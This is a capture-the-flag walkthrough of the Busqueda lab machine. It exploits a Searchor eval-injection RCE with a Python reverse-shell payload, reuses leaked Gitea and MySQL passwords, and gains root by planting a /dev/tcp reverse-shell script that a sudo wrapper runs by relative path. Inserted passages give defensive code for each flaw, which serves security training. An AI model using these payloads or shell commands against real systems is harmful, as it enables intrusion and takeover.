Proof of Concept
10.129.228.217
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Initial Access
Accessing the web service on port 80 redirects to http://searcher.htb
┌──(kali㉿kali)-[~/Busqueda]
└─$ curl http://10.129.228.217
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://searcher.htb/">here</a>.</p>
<hr>
<address>Apache/2.4.52 (Ubuntu) Server at 10.129.228.217 Port 80</address>
</body></html>
Configure the /etc/hosts file
┌──(kali㉿kali)-[~/Busqueda]
└─$ cat /etc/hosts
<SNIP>
10.129.228.217 searcher.htb
After visiting http://searcher.htb, confirmed that the site runs Searchor 2.4.0
Searchor 2.4.0 has a known RCE vulnerability (CVE-2023-43364)
Running a POC that attempts a reverse shell connection
POST /search HTTP/1.1
Host: searcher.htb
Content-Length: 274
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://searcher.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://searcher.htb/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
engine=Accuweather&query=A5',+exec("import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(('10.10.14.248',80))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(['/bin/sh','-i'])%3b"))%23
Reverse shell connection established
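The request above works because the query is spliced into Python source text and passed to eval, so a quote in the query closes the string literal and the rest of the query is executed as code (the trailing `#` comments out whatever the program appended). The following is an added example, not code from the page or from the Searchor project: a minimal model of that eval-based dispatch beside a hardened version that looks the engine up by key and passes the query as an ordinary argument. The `Engine` class, `ENGINES` table, `search_unsafe`, `search_safe` and the `SIDE_EFFECTS` marker list are all constructed for the demonstration; the injected query only appends to that list instead of doing anything harmful.

```python
# Added example (not from the page or the Searchor project): the eval-injection
# pattern behind CVE-2023-43364 beside a hardened lookup. All names are assumptions.
import urllib.parse

SIDE_EFFECTS = []  # constructed marker: records whether injected code ran


class Engine:
    """Constructed stand-in for one search-engine entry."""

    def __init__(self, name, base_url):
        self.name = name
        self.base_url = base_url

    def search(self, query, *ignored):
        # Extra positional arguments are tolerated only so the unsafe path can be
        # shown end to end; a real implementation would take exactly one query.
        return self.base_url + urllib.parse.quote_plus(query)


ENGINES = {
    "Accuweather": Engine("Accuweather", "https://www.accuweather.com/en/search-locations?query="),
    "Google": Engine("Google", "https://www.google.com/search?q="),
}


def search_unsafe(engine, query):
    """Vulnerable pattern: user input is interpolated into source text and eval'd.
    A single quote in `query` ends the string literal, and everything after it
    is parsed and executed as Python."""
    return eval(f"ENGINES['{engine}'].search('{query}')")


def search_safe(engine, query):
    """Hardened: resolve the engine through a dictionary lookup and hand the
    query over as a plain string. Neither value is ever treated as code."""
    try:
        target = ENGINES[engine]
    except KeyError:
        raise ValueError(f"unknown engine: {engine!r}")
    return target.search(query)


if __name__ == "__main__":
    crafted = "A5', SIDE_EFFECTS.append('code ran')) #"  # constructed, benign
    print("unsafe:", search_unsafe("Accuweather", crafted), SIDE_EFFECTS)
    SIDE_EFFECTS.clear()
    print("safe:  ", search_safe("Accuweather", crafted), SIDE_EFFECTS)
```

With the crafted query the unsafe function returns the URL for the literal `A5` and the marker list shows the injected call ran; the safe function returns a URL in which the whole query, quotes and all, is percent-encoded and the marker list stays empty. The fix for this class of bug is always the same: never build code from input, dispatch on a fixed table instead.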
┌──(kali㉿kali)-[~/Busqueda]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.228.217] 49800
can't access tty; job control turned off
$ id
Read user.txt
$ cat user.txt
93f602e6bdcddcfd57d225a9942b1444
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:36:ff brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.228.217/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3130sec preferred_lft 3130sec
inet6 dead:beef::250:56ff:feb0:36ff/64 scope global dynamic mngtmpaddr
valid_lft 86394sec preferred_lft 14394sec
inet6 fe80::250:56ff:feb0:36ff/64 scope link
valid_lft forever preferred_lft forever
<SNIP>
Privilege Escalation
Searching for strings related to “searcher.htb” reveals Gitea account credentials
- cody:jh1usoih2bkjaspwe92
- http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
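The credential comes from a remote URL in the application's .git/config, a classic leak: whoever can read the deployed tree can read the Gitea password. The following is an added example, not code from the page or the box, of a small scanner a defender can run over a deployment to catch this before an attacker does. It finds `url =` lines in git config files, parses them, and reports any URL that carries userinfo, with the password redacted so the report itself does not become a second leak. `find_embedded_credentials`, `redact_url`, `scan_tree` and the sample config text are all constructed for the demonstration (the password in the sample is a placeholder, not the box's).

```python
# Added example (not from the page): flag git remote URLs that embed credentials.
# Function names and the sample config are constructed for this demonstration.
import os
import re
from urllib.parse import urlsplit, urlunsplit

URL_LINE = re.compile(r"^\s*url\s*=\s*(\S+)\s*$", re.IGNORECASE)

# Constructed sample .git/config; "example-secret" is a placeholder password.
SAMPLE_CONFIG = """\
[core]
\trepositoryformatversion = 0
[remote "origin"]
\turl = http://cody:example-secret@gitea.searcher.htb/cody/Searcher_site.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[remote "mirror"]
\turl = git@github.example.test:cody/mirror.git
[remote "public"]
\turl = https://github.example.test/cody/public.git
"""


def redact_url(url):
    """Return the URL with any password replaced by '***' (username is kept,
    since it is useful for triage and not secret on its own)."""
    parts = urlsplit(url)
    if not parts.username and not parts.password:
        return url
    host = parts.hostname or ""
    if parts.port:
        host += f":{parts.port}"
    userinfo = parts.username or ""
    if parts.password:
        userinfo += ":***"
    return urlunsplit((parts.scheme, f"{userinfo}@{host}", parts.path, parts.query, parts.fragment))


def find_embedded_credentials(config_text, source="config"):
    """Scan one git config's text; return a finding per URL carrying userinfo.
    scp-style remotes (git@host:path) have no scheme and cannot embed a password,
    so urlsplit yields no username for them and they are skipped."""
    findings = []
    for lineno, line in enumerate(config_text.splitlines(), 1):
        match = URL_LINE.match(line)
        if not match:
            continue
        url = match.group(1)
        parts = urlsplit(url)
        if parts.username or parts.password:
            findings.append({
                "source": source,
                "line": lineno,
                "user": parts.username,
                "has_password": bool(parts.password),
                "redacted": redact_url(url),
            })
    return findings


def scan_tree(root):
    """Walk a directory tree (e.g. a web root) and scan every .git/config found."""
    results = []
    for dirpath, dirnames, filenames in os.walk(root):
        if os.path.basename(dirpath) == ".git" and "config" in filenames:
            path = os.path.join(dirpath, "config")
            with open(path, encoding="utf-8", errors="replace") as fh:
                results.extend(find_embedded_credentials(fh.read(), source=path))
    return results


if __name__ == "__main__":
    for finding in find_embedded_credentials(SAMPLE_CONFIG, source=".git/config"):
        print(f"{finding['source']}:{finding['line']}: user={finding['user']} "
              f"password={'yes' if finding['has_password'] else 'no'} {finding['redacted']}")
```

Run `scan_tree("/var/www")` on a host to get the same report for every checked-out repository under the web root; the remediation is to move the token into a credential helper or an ssh key and rotate the exposed password.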
svc@busqueda:/var/www/app$ grep -i -r searcher.htb .
grep -i -r searcher.htb .
./templates/index.html: <p class="copyright">searcher.htb © 2023</p>
./.git/logs/HEAD:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator <administrator@gitea.searcher.htb> 1671970461 +0000 commit (initial): Initial commit
./.git/logs/refs/heads/main:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator <administrator@gitea.searcher.htb> 1671970461 +0000 commit (initial): Initial commit
./.git/logs/refs/remotes/origin/main:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator <administrator@gitea.searcher.htb> 1671970461 +0000 update by push
./.git/config: url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
Add the gitea subdomain to the /etc/hosts file
┌──(kali㉿kali)-[~/Busqueda]
└─$ cat /etc/hosts
<SNIP>
10.129.228.217 searcher.htb gitea.searcher.htb
After visiting http://gitea.searcher.htb/, login with the previously discovered cody:jh1usoih2bkjaspwe92 succeeded
Using the discovered password “jh1usoih2bkjaspwe92”, SSH login as the svc user succeeded
┌──(kali㉿kali)-[~/Busqueda]
└─$ sshpass -p 'jh1usoih2bkjaspwe92' ssh svc@10.129.228.217
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-69-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Feb 15 06:03:40 AM UTC 2026
System load: 0.10595703125
Usage of /: 80.3% of 8.26GB
Memory usage: 50%
Swap usage: 0%
Processes: 235
Users logged in: 0
IPv4 address for br-c954bf22b8b2: 172.20.0.1
IPv4 address for br-cbf2c5ce8e95: 172.19.0.1
IPv4 address for br-fba5a3e31476: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.129.228.217
IPv6 address for eth0: dead:beef::250:56ff:feb0:36ff
* Introducing Expanded Security Maintenance for Applications.
Receive updates to over 25,000 software packages with your
Ubuntu Pro subscription. Free for personal use.
https://ubuntu.com/pro
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Apr 4 17:02:09 2023 from 10.10.14.19
svc@busqueda:~$
Check sudo privileges
svc@busqueda:~$ sudo -l
[sudo] password for svc:
Matching Defaults entries for svc on busqueda:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User svc may run the following commands on busqueda:
(root) /usr/bin/python3 /opt/scripts/system-checkup.py *
Check the functions that can be run through the /opt/scripts/system-checkup.py script
- docker-ps
- docker-inspect
- full-checkup
svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py -h
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)
docker-ps : List running docker containers
docker-inspect : Inpect a certain docker container
full-checkup : Run a full system checkup
Confirmed that two containers (gitea, mysql_db) are running
svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
960873171e2e gitea/gitea:latest "/usr/bin/entrypoint…" 3 years ago Up 6 hours 127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp gitea
f84a6b33fb5a mysql:8 "docker-entrypoint.s…" 3 years ago Up 6 hours 127.0.0.1:3306->3306/tcp, 33060/tcp mysql_db
Password found in the mysql_db container configuration
- yuiu1hoiu4i5ho1uh
svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' mysql_db | jq
{
"Hostname": "f84a6b33fb5a",
"Domainname": "",
"User": "",
"AttachStdin": false,
"AttachStdout": false,
"AttachStderr": false,
"ExposedPorts": {
"3306/tcp": {},
"33060/tcp": {}
},
"Tty": false,
"OpenStdin": false,
"StdinOnce": false,
"Env": [
"MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF",
"MYSQL_USER=gitea",
"MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh",
"MYSQL_DATABASE=gitea",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"GOSU_VERSION=1.14",
"MYSQL_MAJOR=8.0",
"MYSQL_VERSION=8.0.31-1.el8",
"MYSQL_SHELL_VERSION=8.0.31-1.el8"
],
"Cmd": [
"mysqld"
],
"Image": "mysql:8",
"Volumes": {
"/var/lib/mysql": {}
},
"WorkingDir": "",
"Entrypoint": [
"docker-entrypoint.sh"
],
"OnBuild": null,
"Labels": {
"com.docker.compose.config-hash": "1b3f25a702c351e42b82c1867f5761829ada67262ed4ab55276e50538c54792b",
"com.docker.compose.container-number": "1",
"com.docker.compose.oneoff": "False",
"com.docker.compose.project": "docker",
"com.docker.compose.project.config_files": "docker-compose.yml",
"com.docker.compose.project.working_dir": "/root/scripts/docker",
"com.docker.compose.service": "db",
"com.docker.compose.version": "1.29.2"
}
}
Using the discovered password, logged in to Gitea as administrator
- administrator:yuiu1hoiu4i5ho1uh
Analysis of the administrator/scripts repository in Gitea (full-checkup.sh and the system-checkup.py listed below) shows that when the full-checkup argument is used, the helper script is executed via a relative path (./full-checkup.sh), i.e. resolved against whatever directory the caller invokes sudo from
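The root cause is the relative path: a root-privileged script trusts the caller's current working directory to supply the file it runs. The following is an added example, not code from the page or from the box's own system-checkup.py, showing how such a helper should be resolved instead: anchor the path to the script's own directory, refuse anything that escapes it, and verify the file and its directory are owned by the expected uid and not writable by others before executing. `safe_script_path`, `run_checkup`, `current_uid` and the `make_fixture` helper (which builds a throwaway directory with one correctly protected and one world-writable script) are all constructed for this demonstration; the `required_owner=0` default reflects a script meant to run under sudo as root.

```python
# Added example (not the page's or the box's code): resolve a privileged helper
# script safely instead of running './full-checkup.sh' from the caller's cwd.
# Function names are assumptions made for this demonstration.
import os
import stat
import subprocess
import tempfile

# Directory of this script, not the caller's working directory.
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__)) if "__file__" in globals() else os.getcwd()
OTHER_WRITABLE = stat.S_IWGRP | stat.S_IWOTH


def current_uid():
    return os.getuid()


def safe_script_path(name, base_dir=SCRIPT_DIR, required_owner=0):
    """Return an absolute path for `name` only if it is a regular file directly
    inside base_dir, and both file and directory are owned by required_owner
    and not writable by group or others. Raise otherwise."""
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, name))
    if os.path.dirname(path) != base:
        raise ValueError(f"{name!r} does not resolve to a file directly inside {base}")
    dir_st = os.stat(base)
    if dir_st.st_uid != required_owner or dir_st.st_mode & OTHER_WRITABLE:
        raise PermissionError(f"{base} must be owned by uid {required_owner} and not writable by others")
    st = os.stat(path)  # FileNotFoundError propagates if the script is missing
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError(f"{path} is not a regular file")
    if st.st_uid != required_owner:
        raise PermissionError(f"{path} is owned by uid {st.st_uid}, expected {required_owner}")
    if st.st_mode & OTHER_WRITABLE:
        raise PermissionError(f"{path} is writable by group or others")
    return path


def run_checkup(name="full-checkup.sh", base_dir=SCRIPT_DIR, required_owner=0):
    """Run the vetted helper with a fixed cwd and a minimal PATH, so neither the
    caller's directory nor the caller's environment influences what executes."""
    path = safe_script_path(name, base_dir, required_owner)
    result = subprocess.run(
        [path], capture_output=True, text=True,
        cwd=os.path.dirname(path),
        env={"PATH": "/usr/sbin:/usr/bin:/sbin:/bin"},
    )
    return result.stdout if result.returncode == 0 else result.stderr


def make_fixture():
    """Constructed fixture for offline testing: a private directory (mode 0700)
    holding a properly protected script and a world-writable one."""
    directory = os.path.realpath(tempfile.mkdtemp(prefix="checkup-"))
    good = os.path.join(directory, "full-checkup.sh")
    with open(good, "w") as fh:
        fh.write("#!/bin/sh\necho checkup-ok\n")
    os.chmod(good, 0o755)
    loose = os.path.join(directory, "loose.sh")
    with open(loose, "w") as fh:
        fh.write("#!/bin/sh\necho tampered\n")
    os.chmod(loose, 0o777)
    return directory, good, loose


if __name__ == "__main__":
    directory, good, loose = make_fixture()
    print(run_checkup(base_dir=directory, required_owner=current_uid()))
    for candidate in ("loose.sh", "../full-checkup.sh"):
        try:
            safe_script_path(candidate, base_dir=directory, required_owner=current_uid())
        except (ValueError, PermissionError) as exc:
            print("rejected:", exc)
```

With this in place, a user who can only run the wrapper through sudo gains nothing from creating their own full-checkup.sh in /tmp: the wrapper never looks there, and a script it does find is rejected unless root owns it and nobody else can write to it.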
#!/bin/bash
import subprocess
import sys

actions = ['full-checkup', 'docker-ps','docker-inspect']

def run_command(arg_list):
    r = subprocess.run(arg_list, capture_output=True)
    if r.stderr:
        output = r.stderr.decode()
    else:
        output = r.stdout.decode()
    return output

def process_action(action):
    if action == 'docker-inspect':
        try:
            _format = sys.argv[2]
            if len(_format) == 0:
                print(f"Format can't be empty")
                exit(1)
            container = sys.argv[3]
            arg_list = ['docker', 'inspect', '--format', _format, container]
            print(run_command(arg_list))
        except IndexError:
            print(f"Usage: {sys.argv[0]} docker-inspect <format> <container_name>")
            exit(1)
        except Exception as e:
            print('Something went wrong')
            exit(1)
    elif action == 'docker-ps':
        try:
            arg_list = ['docker', 'ps']
            print(run_command(arg_list))
        except:
            print('Something went wrong')
            exit(1)
    elif action == 'full-checkup':
        try:
            # relative path: resolved against the current working directory of the caller
            arg_list = ['./full-checkup.sh']
            print(run_command(arg_list))
            print('[+] Done!')
        except:
            print('Something went wrong')
            exit(1)
<SNIP>
Create a full-checkup.sh script file that runs a reverse shell command
svc@busqueda:/tmp$ vi full-checkup.sh
svc@busqueda:/tmp$ cat full-checkup.sh
#! /bin/bash
/bin/bash -c 'sh -i >& /dev/tcp/10.10.14.248/4444 0>&1'
svc@busqueda:/tmp$ chmod a+x full-checkup.sh
Start the nc reverse shell listener
┌──(kali㉿kali)-[~/Busqueda]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
Run full-checkup using sudo
svc@busqueda:/tmp$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
[+] Done!
Reverse shell connection established
┌──(kali㉿kali)-[~/Busqueda]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.228.217] 58680
#
Read root.txt
┌──(kali㉿kali)-[~/Busqueda]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.228.217] 40858
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
fcdac6a9e7e3e9d50644c54081731f18
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:36:ff brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.228.217/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2373sec preferred_lft 2373sec
inet6 dead:beef::250:56ff:feb0:36ff/64 scope global dynamic mngtmpaddr
valid_lft 86400sec preferred_lft 14400sec
inet6 fe80::250:56ff:feb0:36ff/64 scope link
valid_lft forever preferred_lft forever
<SNIP>